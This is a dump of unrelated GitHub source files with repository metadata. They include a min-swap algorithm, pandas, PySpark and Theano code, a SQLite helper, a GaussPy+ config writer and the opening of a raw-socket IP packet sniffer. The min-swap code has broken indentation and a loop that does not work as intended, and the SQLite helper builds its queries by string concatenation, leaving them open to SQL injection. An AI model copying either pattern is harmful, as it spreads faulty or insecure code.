ans, c, j = -1, 0, 0
for i in range(n):
# If the element is already placed
# correct, then continue
if vec[i][1] == i:
continue
else:
# swap with its respective index
vec[i][0], vec[vec[i][1]][1] = vec[vec[i][1]][1], vec[i][0]
vec[i][1], vec[vec[i][1]][1] = vec[vec[i][1]][1], vec[i][1]
# swap until the correct
# index matches
if i != vec[i][1]:
i -= 1
# each swap makes one element
# move to its correct index,
# so increment answer
ans += 1
return ans
# Driver code
arr = [1, 5, 4, 3, 2]
arr2 = [5, 4, 3, 2, 1]
n = len(arr)
print(findMinSwap(arr, n))
# This code is contributed by mohit kumar 29
| [
"Mohammad.Rijwan@ril.com"
] | Mohammad.Rijwan@ril.com |
243d9867b8061153fc7a04ba2758583b186e5005 | bfc15a15ea7b8c201479205e0a3dd2cbd3385e1f | /Dataframe/application-6.py | fc64d5dc4f10ff8ee07561a25fe22d1d2675b2ad | [] | no_license | RahulBantode/Pandas_python | b3be5ccecce07f3073d469eb42614b83083cd144 | b5115cc40039e79d263d29a5822506a2da0869a8 | refs/heads/main | 2023-05-31T16:25:39.883123 | 2021-06-14T06:06:05 | 2021-06-14T06:06:05 | 364,258,067 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | # Write a program to convert the list of nested dictonary into pandas dataframe
import pandas as pd
def main():
data = [
{
"Student" : [ {"Exam": 90, "Grade": "A"},
{"Exam": 99, "Grade": "O"},
{"Exam": 59, "Grade": "C"}
],
"Name" : "Nitin Chaudhary"
},
{
"Student" : [ {"Exam": 80, "Grade": "A"},
{"Exam": 70, "Grade": "B"},
{"Exam": 59, "Grade": "C"}
],
"Name" : "Kunal Chinchole"
},
{
"Student" : [ {"Exam": 90, "Grade": "A"},
{"Exam": 40, "Grade": "D"},
{"Exam": 30, "Grade": "D-"}
],
"Name" : "Mohit Sharma"
}
]
for i in range(len(data)):
print(data[i])
#adding dict values to rows
rows = []
for d in data:
data_row = d["Student"]
time = d["Name"]
for row in data_row:
row["Name"] = time
rows.append(row)
df = pd.DataFrame(rows)
print(df)
if __name__ == '__main__':
main() | [
"noreply@github.com"
] | RahulBantode.noreply@github.com |
302e4f5d54775811ffb4a5eaa0bf7f0d067c4f6e | c8b9750ceca3a7577a5f7ed92635fa64dc4c8a3b | /ML/dat/fake/step_3_create_data_stats.py | 98c569c128ec70f08a37f8ff68c53e0514e3cc6e | [] | no_license | MaazAmjad/fakenews-1 | 98ce7fd468d132f04e72b0697445a186e0cda9cd | f0dc42e188ccbbbdf01b0462de9c5564e9e222bc | refs/heads/master | 2020-04-10T06:28:16.082434 | 2017-06-25T17:56:46 | 2017-06-25T17:56:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | import glob
import os
import numpy as np
import pickle
dataset_name = 'fake'
# Change this to a list of the time slices
files = glob.glob('train/*.npy')
dat_stats={}
dat_stats['name'] = dataset_name
dat_stats['T_bins'] = ['all']
dat_stats['prefix'] = 0
T = len(dat_stats['T_bins'])
def count_words(split):
dat_stats[split] = np.zeros(T)
for t, i in enumerate(dat_stats['T_bins']):
if split=='train':
print(i)
for fname in files:
dat = np.load(fname)
dat_stats[split][t] += len(dat)
count_words('train')
pickle.dump(dat_stats, open('dat_stats.pkl', "w" ) )
| [
"marirudolph@gmail.com"
] | marirudolph@gmail.com |
96ca6a2aa20fc70c52aeb01a51a7601fdc92df16 | 96a869cb1ebef0ce0f17b2f4003dc47b712023a2 | /tests/test_encoder.py | 803649b511d1ed96bc398dab95723bb4b93dc47f | [
"MIT"
] | permissive | lincheney/journald-2-cloudwatch | c7b256b9365cddef5bf6193beb72d41a690413b3 | 54ca0785ffe55565a4af853c6c2d10f974c52e6b | refs/heads/master | 2021-07-07T11:28:50.039557 | 2021-05-08T13:11:21 | 2021-05-08T13:11:21 | 54,527,621 | 5 | 10 | MIT | 2021-05-08T08:24:12 | 2016-03-23T03:21:08 | Python | UTF-8 | Python | false | false | 1,036 | py | from unittest import TestCase
import datetime
import uuid
import json
import main
class JsonEncodeTest(TestCase):
def dumps(self, value):
return json.dumps(value, cls=main.JournalMsgEncoder)
def test_encode_default(self):
''' test encoding is same as defaults '''
for obj in [
"string",
123,
123.45,
[1, 2, 'x'],
dict(key='value'),
[1, dict(key=dict(nested=[])), ['a', 'b', 'c']],
]:
self.assertEqual(self.dumps(obj), json.dumps(obj))
self.assertRaises(TypeError, self.dumps, object())
self.assertRaises(TypeError, self.dumps, {'dict': object()})
def test_encode_datetime(self):
''' test encoding datetime '''
obj = datetime.datetime.now()
self.assertEqual(self.dumps(obj), json.dumps(obj.timestamp()))
def test_encode_uuid(self):
''' test encoding uuids '''
obj = uuid.uuid4()
self.assertEqual(self.dumps(obj), json.dumps(str(obj)))
| [
"lincheney@gmail.com"
] | lincheney@gmail.com |
68844fda6183aab0481569bfa8e808c884a38b0c | f0205344df67e01f6c848456d8696332e352b2c5 | /opencv_webapp/opencv_webapp/asgi.py | 1d3f1f3192e12af8e55145399335a54711b6bdc2 | [] | no_license | Mactto/OpenCV_Webapp | 4ec729009011db2519d4b051b665acc60bd7018f | 341e214f46ad414161a40e20f7f98965398cec6a | refs/heads/master | 2023-03-17T11:44:23.420036 | 2021-02-27T17:14:05 | 2021-02-27T17:14:05 | 341,464,801 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | """
ASGI config for opencv_webapp project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'opencv_webapp.settings')
application = get_asgi_application()
| [
"shc9928@gmail.com"
] | shc9928@gmail.com |
816bc1f2b26ff3327eaf800a4aa881e8d8d25c92 | ff428bee2cbace63c48cd9681fe072043a2b1ef0 | /06_Yelp_Sentiment_Analysis/pos_neg.py | 2cf012f8ab0ec790ff43ef6f18b265695527d8fa | [] | no_license | theoliao1998/Data-Manipulation-and-Analysis | e3f139e3cbc1217027fdd2b143cc9140061db8f5 | 64cd0379871dae7e3680e91e575af6ef3e0f227e | refs/heads/master | 2020-08-04T18:53:21.273123 | 2019-12-10T03:20:05 | 2019-12-10T03:20:05 | 212,243,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,420 | py | #pyspark --master yarn --num-executors 35 --executor-memory 5g --executor-cores 4 --conf spark.ui.port="$(shuf -i 10000-60000 -n 1)"
import json
import math
import re
from pyspark import SparkConf, SparkContext
from pyspark.sql import SQLContext
conf = SparkConf().setAppName("si618_lec6")
sc = SparkContext(conf=conf)
sqlContext = SQLContext(sc)
input_file = sc.textFile("hdfs:///var/umsi618/hw5/review.json")
inputs = input_file.map(lambda line: json.loads(line))
WORD_RE=re.compile(r"\b[\w]+\b")
def convert_dict_to_tuples(d):
text = d['text']
rating = d['stars']
tokens = WORD_RE.findall(text.lower())
tuples = [(rating,t) for t in tokens]
return tuples
rating_word = inputs.flatMap(convert_dict_to_tuples)
all_count = rating_word.map(lambda x: (x[1],1)) \
.reduceByKey(lambda x, y: (x + y))
pos_word = rating_word.filter(lambda x: x[0]>=5)
pos_count = pos_word.map(lambda x: (x[1],1)) \
.reduceByKey(lambda x, y: (x + y))
"""
[(u'halligan', 2), (u'kickasss', 2), (u'divinely', 95), (u'hasnbeen', 1), (u'oec', 1),
(u'four', 36404), (u'prices', 179031), (u'conjuring', 15), (u'sentaron', 1), (u'otro', 155)]
"""
neg_word = rating_word.filter(lambda x: x[0]<=2)
neg_count = neg_word.map(lambda x: (x[1],1)) \
.reduceByKey(lambda x, y: (x + y))
"""
[(u'rasamalai', 4), (u'potillos', 1), (u'063016', 1), (u'varierty', 1), (u'four', 36260),
(u'prices', 73835), (u'conjuring', 18), (u'sevens', 96), (u'profil', 1), (u'amminities', 1)]
"""
all_review_count = all_count.map(lambda x: x[1]).sum() #762235885
pos_review_count = pos_count.map(lambda x: x[1]).sum() #263994836
neg_review_count = neg_count.map(lambda x: x[1]).sum() #225489788
freq_words = all_count.filter(lambda x: x[1]>1000).cache()
step_3pos = freq_words.join(pos_count)
step_3neg = freq_words.join(neg_count)
positivity = step_3pos.map(lambda x:(x[0], math.log(float(x[1][1])/pos_review_count) \
- math.log(float(x[1][0])/all_review_count)))
sorted_pos = positivity.sortBy(lambda x:x[1], ascending = False)
sorted_pos.saveAsTextFile('si618_hw6_theoliao_posreview.csv')
negativity = step_3neg.map(lambda x:(x[0], math.log(float(x[1][1])/neg_review_count) \
- math.log(float(x[1][0])/all_review_count)))
sorted_neg = negativity.sortBy(lambda x:x[1], ascending = False)
sorted_neg.saveAsTextFile('si618_hw6_theoliao_negreview.csv')
| [
"theoliao1998@gmail.com"
] | theoliao1998@gmail.com |
1cbe7bc5b397893e2a6ed6ca7e72b9c502181a5f | 7fb01b504bfbb5bb57a298f9bfe67a5a04fb61f6 | /Layers/struct_edge_decoder_layer.py | 2fbeb6d106d73af8e851f7fb6ba6a15395781448 | [
"BSD-3-Clause"
] | permissive | feiliu01/struct_infused_summ | 8484a20ecddcd7b0f3dc974593b5f178e299fa0a | 330ae816cf3dc7708b7ee7c24d921f9f5f459e25 | refs/heads/master | 2020-03-19T00:47:31.522014 | 2018-05-30T21:51:56 | 2018-05-30T21:51:56 | 135,502,005 | 1 | 0 | null | 2018-05-30T22:03:08 | 2018-05-30T22:03:08 | null | UTF-8 | Python | false | false | 4,754 | py | import theano
import theano.tensor as T
import numpy as np
from utility.utility import *
from lstm_layer import *
from feedforward_layer import *
from attention_layer import *
from indexing_layer import *
'''
LayerName : attention_stanford_decoder_layer
Math:
h_d_t = LSTM(h_d_(t-1), y_(t-1))
e_t_i = f_att(h_d_t, h_e_i)
alpha_t = softmax(e_t_i)
context_t = alpha_t * e_t
h_d2_t = tanh(W[h_d_t, context_t])
Or h_d2_t = LSTM(h_d2_(t-1), [h_d_t, context_t])
dist = softmax(W * h_d2_t)
Parameters:
n_emb: dimension of y_(t-1)
n_att: dimension of attention layer
n_h1: dimension of h_d_t
n_h2: dimension of h_d2_t
n_he: dimension of h_e_i
'''
def struct_edge_decoder_init(prefix, params, layer_setting):
params = lstm_init(prefix+'_lstm', params, layer_setting['_lstm'])
params = attention_init(prefix+'_att_1', params, layer_setting['_att_1'])
params = attention_init(prefix+'_att_2', params, layer_setting['_att_2'])
params = indexing_init(prefix+'parent', params, layer_setting)
params[join(prefix,'epsilon')] = numpy_floatX(0.5)
params = feedforward_init(prefix+'_tanh', params, layer_setting['_tanh'])
params = feedforward_init(prefix+'_softmax', params, layer_setting['_softmax'])
params = feedforward_init(prefix+'_switcher', params, layer_setting['_switcher'])
return params
def struct_edge_decoder_calc(prefix, params, layer_setting, h_e, s_e, parent, mask_below, state_below, h_init = None, c_init = None, mask = None, training = True):
[h_d, c_d] = lstm_calc(prefix+'_lstm', params, layer_setting['_lstm'], state_below, h_init, c_init, mask, training = training)
alpha = attention_calc(prefix+'_att_1', params, layer_setting['_att_1'], h_d, h_e)
beta = attention_calc(prefix+'_att_2', params, layer_setting['_att_2'], h_d, s_e)
#alpha : T_D, N, T_E
#beta : T_D, N, T_E
alpha2 = T.concatenate([T.zeros_like(alpha[:1], dtype = 'float32'),T.cumsum(alpha, axis = 0)], axis = 0)[:-1]
#alpha2 : T_D, N, T_E
position = T.cumsum(T.ones_like(mask_below, dtype = 'int64') * mask_below, axis = 0) - 1
#position : T_E, N
cond_1 = (position < parent)
#cond_1 = (T.neq(position, -T.ones_like(position)))
#cond_1: T_E, N
cond_2 = (parent < position) & (T.neq(position, -T.ones_like(position)))
#cond_2 = (T.neq(position, -T.ones_like(position)))
#cond_2: T_E, N
cond_1_ = T.tile(cond_1, (alpha.shape[0], 1, 1)).dimshuffle(0,2,1)
#cond_1_ : T_D, N, T_E
cond_2_ = T.tile(cond_2, (alpha.shape[0], 1, 1)).dimshuffle(0,2,1)
#cond_2_ : T_D, N, T_E
alpha2_p = indexing_calc(prefix+'parent', params, alpha2.dimshuffle(2,1,0), parent).dimshuffle(2,1,0)
#alpha2_p : T_D, N, T_E
item_1 = beta * alpha2
#item_1 : T_D, N, T_E
item_2 = beta * alpha2_p
#item_2 : T_D, N, T_E
target = T.where(cond_1, parent, -T.ones_like(parent, dtype = 'int64'))
#target: T_E, N
target = T.tile(target, (alpha.shape[0], 1, 1)).dimshuffle(0,2,1)
#target: T_D, N, T_E
gamma = T.where(cond_2_, item_2, T.zeros_like(item_2, dtype = 'float32'))
#gamma: T_D, N, T_E
target_plus = T.concatenate([T.zeros_like(target[:,:,:1], dtype = 'int64'), target+1], axis = 2)
#target_plus: T_D, N, T_E + 1
item_1_plus = T.concatenate([T.zeros_like(item_1[:,:,:1], dtype = 'float32'), item_1], axis = 2)
#target_plus: T_D, N, T_E + 1
target_flat = target_plus.flatten()
#target_plus: T_D * N * (T_E + 1)
item_1_flat = item_1_plus.flatten()
#item_1_flat: T_D * N * (T_E + 1)
t_d, n_sample, t_e = item_1_plus.shape
M = T.zeros((t_d * n_sample * t_e, t_e), dtype = 'float32')
d_flat = T.arange(t_d * n_sample * t_e, dtype = 'int64')
#M[d_flat,target_flat = item_1_flat
M = T.set_subtensor(M[(d_flat, target_flat)], item_1_flat)
M = T.reshape(M, (t_d, n_sample, t_e, t_e), ndim = 4)
#M = M.dimshuffle(0,3,1,2)
gamma += T.sum(M, axis = 2)[:,:,1:]
delta = alpha + params[join(prefix,'epsilon')] * gamma
delta = delta / T.sum(delta, axis = 2, keepdims=True)
context = T.batched_dot(delta.dimshuffle(1,0,2), h_e.dimshuffle(1,0,2)).dimshuffle(1,0,2)
h_d_2 = feedforward_calc(prefix+'_tanh', params, layer_setting['_tanh'], T.concatenate([h_d, context], axis = 2))
dist = feedforward_calc(prefix+'_softmax', params, layer_setting['_softmax'], h_d_2)
switcher = feedforward_calc(prefix+'_switcher', params, layer_setting['_switcher'], T.concatenate([h_d, context, state_below], axis = 2))
return h_d, c_d, dist, alpha, beta, gamma, delta, switcher
| [
"kqsong2014@gmail.com"
] | kqsong2014@gmail.com |
4f5adbe134e4234f219d36ceb9f338e77805f34d | 6b77ae897567d391780efa7457368301077e2330 | /untitled5/aqllie3.py | 15b5b4e41368ad2d69808be0dd151b70bebe7041 | [] | no_license | wapjin/python-code | 03ba079ebc551941c3d0d1122db5fb944070e397 | d82f7e64b6c62bf8eb04f960c8fa03b02495b2fc | refs/heads/master | 2020-12-13T17:59:25.265569 | 2020-03-21T08:12:16 | 2020-03-21T08:12:16 | 234,477,075 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019-11-11 8:55
# @Author : liujin
# @Email : 1045833538@QQ.com
# @File : aqllie3.py
import sqlite3
conn = sqlite3.connect('test.db')
def sql_colose():
conn.commit()
conn.close()
def sql_lite():
return conn.cursor()
# 建表操作
def new_table():
cursor = sql_lite()
cursor.execute('create table user (id INTEGER PRIMARY KEY AUTOINCREMENT, name varchar(20))')
cursor.close()
# 删表操作
def del_table():
cursor = sql_lite()
cursor.execute('DROP TABLE user;')
cursor.close()
# 添加操作
def add_td(value):
cursor = sql_lite()
cursor.execute('insert into user (name) values ("'+value+'")')
print(cursor.rowcount)
cursor.close()
# 查询操作
def get_table():
cursor = sql_lite()
cursor.execute('select * from user')
values = cursor.fetchall()
print(values)
cursor.close()
# 删除操作
def del_td(id):
cursor = sql_lite()
cursor.execute('DELETE FROM user WHERE name like "%'+str(id)+'";')
cursor.close()
#更新操作
def up_td(sql_value):
cursor = sql_lite()
cursor.execute(sql_value)
cursor.close()
# add_td("meinv")
# del_td("xiaozhuang")
# new_table()
get_table()
up_td('UPDATE user SET name = "jin" WHERE id = 3;')
get_table()
# del_table()
sql_colose() | [
"1045833538@qq.com"
] | 1045833538@qq.com |
d115e9cbc8f86f38f8bbf1f21c6949e209b82664 | 9bc72b4fcfd71154e41057ce5b149d6a9f657661 | /decision_tree/decision_tree_iris.py | 48b6345d73fb70f4c268d57ca3dc16c172102db8 | [] | no_license | ChenKangQiang/scikit_learn_test | 2f0cc875da64133d2e382bc0d8f5995d939a38d9 | 3ed52d950c7e5d9ebd18e2f8b2683223a38ea7ca | refs/heads/master | 2020-03-12T10:23:02.795612 | 2018-04-22T13:51:56 | 2018-04-22T13:51:56 | 130,571,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | from sklearn.datasets import load_iris
from sklearn import tree
import pydotplus
# Iris Iris也称鸢尾花卉数据集
iris = load_iris()
clf = tree.DecisionTreeClassifier()
clf = clf.fit(iris.data, iris.target)
dot_data = tree.export_graphviz(clf, out_file=None)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_pdf("iris.pdf")
| [
"ckq123@outlook.com"
] | ckq123@outlook.com |
be5b913111b7671ed74f5a4a6124902cba8e3f12 | f4fb0d1c80638440b56e21262f603d3d1f177dd0 | /gausspyplus/config_file.py | 77e79a07e1cac20c3fa5c5c9a440a85eed0d001b | [] | no_license | Deech08/gausspyplus | 7915d3927f6b2a1132cfab2a94e8d3f4d48f9f33 | 0ea7f91321f648e70984ca6b3f1532ef6b6b53fd | refs/heads/master | 2020-06-23T14:54:21.135261 | 2019-06-26T09:20:46 | 2019-06-26T09:20:46 | 198,655,468 | 1 | 0 | null | 2019-07-24T14:48:45 | 2019-07-24T14:48:44 | null | UTF-8 | Python | false | false | 19,065 | py | # @Author: riener
# @Date: 2019-03-03T20:27:37+01:00
# @Filename: config_file.py
# @Last modified by: riener
# @Last modified time: 2019-04-08T10:08:05+02:00
import ast
import configparser
import collections
import os
from astropy import units as u
from .utils.output import save_file
def append_keywords(config_file, dct, all_keywords=False, description=True):
for key in dct.keys():
if all_keywords:
if description:
config_file.append(
'\n\n# {}'.format(dct[key]['description']))
config_file.append('\n{} = {}'.format(key, dct[key]['default']))
else:
if dct[key]['simple']:
if description:
config_file.append(
'\n\n# {}'.format(dct[key]['description']))
config_file.append('\n{} = {}'.format(key, dct[key]['default']))
return config_file
def make(all_keywords=False, description=True, output_directory='',
filename='gausspy+.ini'):
"""Create a GaussPy+ configuration file.
Parameters
----------
all_keywords : bool
Default is `False`, which includes only the most essential parameters. If set to `True`, include all parameters in the configuration file.
description : bool
Default is `True`, which includes descriptions of the parameters in the configuration file.
output_directory : string
Directory to which configuration file gets saved.
filename : string
Name of the configuration file.
Returns
-------
type
Description of returned object.
"""
config_file = str('# Configuration file for GaussPy+\n\n')
default = [
('log_output', {
'default': 'True',
'description': "log messages printed to the terminal in 'gpy_log' directory [True/False]",
'simple': False}),
('verbose', {
'default': 'True',
'description': "print messages to the terminal [True/False]",
'simple': False}),
('overwrite', {
'default': 'True',
'description': "overwrite files [True/False]",
'simple': False}),
('suffix', {
'default': '""',
'description': "suffix added to filename [str]",
'simple': False}),
('use_ncpus', {
'default': 'None',
'description': "number of CPUs used in parallel processing. By default 75% of all CPUs on the machine are used. [int]",
'simple': True}),
('snr', {
'default': '3.',
'description': "Required minimum signal-to-noise ratio for data peak. [float]",
'simple': True}),
('significance', {
'default': '5.',
'description': "Required minimum value for significance criterion. [float]",
'simple': True}),
('snr_noise_spike', {
'default': '5.',
'description': "Required signal-to-noise ratio for negative data values to be counted as noise spikes. [float]",
'simple': False}),
('min_fwhm', {
'default': '1.',
'description': "Required minimum value for FWHM values of fitted Gaussian components specified in fractions of channels. [float]",
'simple': False}),
('max_fwhm', {
'default': 'None',
'description': "Enforced maximum value for FWHM parameter specified in fractions of channels. Use with caution! Can lead to artifacts in the fitting. [float]",
'simple': False}),
('separation_factor', {
'default': '0.8493218',
'description': "The required minimum separation between two Gaussian components (mean1, fwhm1) and (mean2, fwhm2) is determined as separation_factor * min(fwhm1, fwhm2). [float]",
'simple': False}),
('fwhm_factor', {
'default': '2.',
'description': "factor by which the FWHM value of a fit component has to exceed all other (neighboring) fit components to get flagged [float]",
'simple': False}),
('min_pvalue', {
'default': '0.01',
'description': "p-value for the null hypothesis that the normalised residual resembles a normal distribution. [float]",
'simple': False}),
('two_phase_decomposition', {
'default': 'True',
'description': "Whether to use one or two smoothing parameters for the decomposition. [True/False]",
'simple': False}),
('refit_blended', {
'default': 'True',
'description': "Refit blended components. [True/False]",
'simple': True}),
('refit_broad', {
'default': 'True',
'description': "Refit broad components. [True/False]",
'simple': True}),
('refit_neg_res_peak', {
'default': 'True',
'description': "Refit negative residual features. [True/False]",
'simple': True}),
('refit_rchi2', {
'default': 'False',
'description': "Refit spectra with high reduced chi-square value. [True/False]",
'simple': False}),
('refit_residual', {
'default': 'True',
'description': "Refit spectra with non-Gaussian distributed residuals. [True/False]",
'simple': True}),
('refit_ncomps', {
'default': 'True',
'description': "Refit if number of fitted components is not compatible with neighbors. [True/False]",
'simple': True}),
('p_limit', {
'default': '0.02',
'description': "Probability threshold given in percent for features of consecutive positive or negative channels to be counted as more likely to be a noise feature [float]",
'simple': False}),
('signal_mask', {
'default': 'True',
'description': "Constrict goodness-of-fit calculations to spectral regions estimated to contain signal [True/False]",
'simple': False}),
('pad_channels', {
'default': '5',
'description': "Number of channels by which an interval (low, upp) gets extended on both sides, resulting in (low - pad_channels, upp + pad_channels). [int]",
'simple': False}),
('min_channels', {
'default': '100',
'description': "Required minimum number of spectral channels that the signal ranges should contain. [int]",
'simple': False}),
('mask_out_ranges', {
'default': '[]',
'description': "Mask out ranges in the spectrum; specified as a list of tuples [(low1, upp1), ..., (lowN, uppN)]",
'simple': False}),
('random_seed', {
'default': '111',
'description': "Seed for random processes [int]",
'simple': True}),
('main_beam_efficiency', {
'default': 'None',
'description': "Specify if intensity values should be corrected by the main beam efficiency given in percent. [float]",
'simple': False}),
('vel_unit', {
'default': 'u.km / u.s',
'description': "Unit to which velocity values will be converted. [astropy.units]",
'simple': True}),
('testing', {
'default': 'False',
'description': "Testing mode; only decomposes a single spectrum. [True/False]",
'simple': False})
]
dct_default = collections.OrderedDict(default)
training = [
('n_spectra', {
'default': '100',
'description': "Number of spectra contained in the training set [int]",
'simple': True}),
('order', {
'default': '6',
'description': "Minimum number of spectral channels a peak has to contain on either side [int]",
'simple': True}),
('rchi2_limit', {
'default': '1.5',
'description': "maximium value of reduced chi-squared for decomposition result [float]",
'simple': True}),
('use_all', {
'default': 'False',
'description': "Use all spectra in FITS cube as training set [True/False]",
'simple': False}),
('params_from_data', {
'default': 'True',
'description': " [True/False]",
'simple': False}),
('alpha1_initial', {
'default': 'None',
'description': " [float]",
'simple': False}),
('alpha2_initial', {
'default': 'None',
'description': " [float]",
'simple': False}),
('snr_thresh', {
'default': 'None',
'description': " [float]",
'simple': False}),
('snr2_thresh', {
'default': 'None',
'description': " [float]",
'simple': False})
]
dct_training = collections.OrderedDict(training)
preparation = [
('n_spectra_rms', {
'default': '1000',
'description': "Number of spectra used to estimate average root-mean-square noise [int]",
'simple': False}),
('gausspy_pickle', {
'default': 'True',
'description': "Save the prepared FITS cube as pickle file [bool]",
'simple': False}),
('data_location', {
'default': 'None',
'description': "Only used for 'testing = True'; specify location of spectrum used for test decomposition as (y, x) [tuple]",
'simple': False}),
('simulation', {
'default': 'False',
'description': "Set to 'True' if FITS cube contains simulation data without noise [bool]",
'simple': False}),
('rms_from_data', {
'default': 'True',
'description': "Calculate the root-mean-square noise from the data [bool]",
'simple': True}),
('average_rms', {
'default': 'None',
'description': "Average data of the FITS cube; if no value is supplied it is estimated from the data [float]",
'simple': True})
]
dct_preparation = collections.OrderedDict(preparation)
decomposition = [
# ('gausspy_decomposition', {
# 'default': 'True',
# 'description': " [bool]",
# 'simple': False}),
('save_initial_guesses', {
'default': 'False',
'description': "Save initial component guesses of GaussPy as pickle file [bool]",
'simple': False}),
('alpha1', {
'default': 'None',
'description': "First smoothing parameter [float]",
'simple': True}),
('alpha2', {
'default': 'None',
'description': "Second smoothing parameter (only used if 'two_phase_decomposition = True') [float]",
'simple': True}),
('snr_thresh', {
'default': 'None',
'description': "Signal-to-noise threshold used in GaussPy decomposition for original spectrum. Defaults to 'snr' if not specified. [float]",
'simple': False}),
('snr2_thresh', {
'default': 'None',
'description': "Signal-to-noise threshold used in GaussPy decomposition for second derivative of spectrum. Defaults to 'snr' if not specified. [float]",
'simple': False}),
('improve_fitting', {
'default': 'True',
'description': "Use the improved fitting routine. [bool]",
'simple': False}),
('exclude_means_outside_channel_range', {
'default': 'True',
'description': "Exclude Gaussian fit components if their mean position is outside the channel range. [bool]",
'simple': False}),
('snr_fit', {
'default': 'None',
'description': "Required minimum signal-to-noise value for fitted components. Defaults to 'snr/2' if not specified. [float]",
'simple': False}),
('snr_negative', {
'default': 'None',
'description': "Required minimum signal-to-noise value for negative data peaks. Used in the search for negative residual peaks. Defaults to 'snr' if not specified. [float]",
'simple': False}),
('max_amp_factor', {
'default': '1.1',
'description': "Factor by which the maximum data value is multiplied to get a maximum limit for the fitted amplitudes. [float]",
'simple': False})
]
dct_decomposition = collections.OrderedDict(decomposition)
spatial_fitting = [
# , {
# 'default': ,
# 'description': " []",
# 'simple': False},
('exclude_flagged', {
'default': 'False',
'description': "Exclude all flagged spectra as possible refit solutions. [bool]",
'simple': False}),
('rchi2_limit', {
'default': None,
'description': "maximium value for the reduced chi-squared above which the fit gets flagged [float]",
'simple': False}),
('rchi2_limit_refit', {
'default': 'None',
'description': "Defaults to 'rchi2_limit' if not specified. [float]",
'simple': False}),
('max_diff_comps', {
'default': '1',
'description': "Maximum allowed difference in the number of fitted components compared to weighted median of immediate neighbors [int]",
'simple': True}),
('max_jump_comps', {
'default': '2',
'description': "Maximum allowed difference in the number of fitted components between individual neighboring spectra [int]",
'simple': True}),
('n_max_jump_comps', {
'default': '1',
'description': "Maximum number of allowed 'max_jump_comps' occurrences for a single spectrum. [int]",
'simple': True}),
('max_refitting_iteration', {
'default': '30',
'description': "Maximum number for refitting iterations. [int]",
'simple': False}),
('flag_blended', {
'default': 'True',
'description': "Flag spectra with blended fit components. [bool]",
'simple': False}),
('flag_neg_res_peak', {
'default': 'True',
'description': "Flag spectra with negative residual features. [bool]",
'simple': False}),
('flag_rchi2', {
'default': 'False',
'description': "Flag spectra with high reduced chi-square values. [bool]",
'simple': False}),
('flag_residual', {
'default': 'True',
'description': "Flag spectra with non-Gaussian distributed residuals. [bool]",
'simple': False}),
('flag_broad', {
'default': 'True',
'description': "Flag spectra with broad fit components. [bool]",
'simple': False}),
('flag_ncomps', {
'default': 'True',
'description': "Flag spectra with number of fit components incompatible with neighbors. [bool]",
'simple': False}),
('mean_separation', {
'default': '2.',
'description': "Maximum difference in offset positions of fit components for grouping. [float]",
'simple': True}),
('fwhm_separation', {
'default': '4.',
'description': "Maximum difference in FWHM values of fit components for grouping. [float]",
'simple': True}),
('fwhm_factor_refit', {
'default': 'None',
'description': "Defaults to 'fwhm_factor' if not specified. [float]",
'simple': False}),
('broad_neighbor_fraction', {
'default': '0.5',
'description': "Spectra get flagged as containing broad components if the FWHM value of one of their fit components exceeds the FWHM values of all fit components for this fraction of neighbors [float]",
'simple': False}),
('min_weight', {
'default': '0.5',
'description': "Minimum weight threshold for phase 2 of spatially coherent refitting. [float]",
'simple': True}),
('weight_factor', {
'default': '2',
'description': "Factor that determines the weight given to neighboring spectra located at a distance of 1 and 2 pixels. [int/float]",
'simple': False}),
('only_print_flags', {
'default': 'False',
'description': "Only print flags in terminal without refitting. [bool]",
'simple': False})
]
dct_spatial_fitting = collections.OrderedDict(spatial_fitting)
config_file = []
config_file.append('[DEFAULT]')
config_file = append_keywords(config_file, dct_default,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[training]')
config_file = append_keywords(config_file, dct_training,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[preparation]')
config_file = append_keywords(config_file, dct_preparation,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[decomposition]')
config_file = append_keywords(config_file, dct_decomposition,
all_keywords=all_keywords,
description=description)
config_file.append('\n\n[spatial fitting]')
config_file = append_keywords(config_file, dct_spatial_fitting,
all_keywords=all_keywords,
description=description)
if not output_directory:
output_directory = os.getcwd()
with open(os.path.join(output_directory, filename), 'w') as file:
for line in config_file:
file.write(line)
save_file(filename, output_directory)
def get_values_from_config_file(self, config_file, config_key='DEFAULT'):
"""Read in values from a GaussPy+ configuration file.
Parameters
----------
config_file : str
Filepath to configuration file of GaussPy+.
config_key : str
Section of GaussPy+ configuration file, whose parameters should be read in addition to 'DEFAULT'.
"""
config = configparser.ConfigParser()
config.read(config_file)
for key, value in config[config_key].items():
try:
setattr(self, key, ast.literal_eval(value))
except ValueError:
if key == 'vel_unit':
value = u.Unit(value)
setattr(self, key, value)
else:
raise Exception('Could not parse parameter {} from config file'.format(key))
| [
"riener@mpia.de"
] | riener@mpia.de |
f0ded2b48bdd2dcc0964e1b543f2a49c1904ea15 | d223ac1fd284026ac91d02f35e89b7931e65e860 | /Passive/basic_scanner.py | 295258a0b3194aa67240f08001984d1a71356771 | [] | no_license | k-cross/netseries | 6a877e9541ba40aa2da0f0b451c78fb4e716c21a | 4df2b1815e6dba19c12d139694d7f05ca687a31a | refs/heads/master | 2021-01-17T19:11:02.941587 | 2016-08-18T22:38:19 | 2016-08-18T22:38:19 | 64,818,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,952 | py | import sys
import socket
import os
import struct
import time
import threading
from netaddr import IPNetwork, IPAddress
from ctypes import *
class IP(Structure):
_fields_ = [
('ihl', c_ubyte, 4),
('version', c_ubyte, 4),
('tos', c_ubyte),
('len', c_ushort),
('id', c_ushort),
('offset', c_ushort),
('ttl', c_ubyte),
('protocol_num', c_ubyte),
('sum', c_ushort),
('src', c_uint32),
('dst', c_uint32)
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
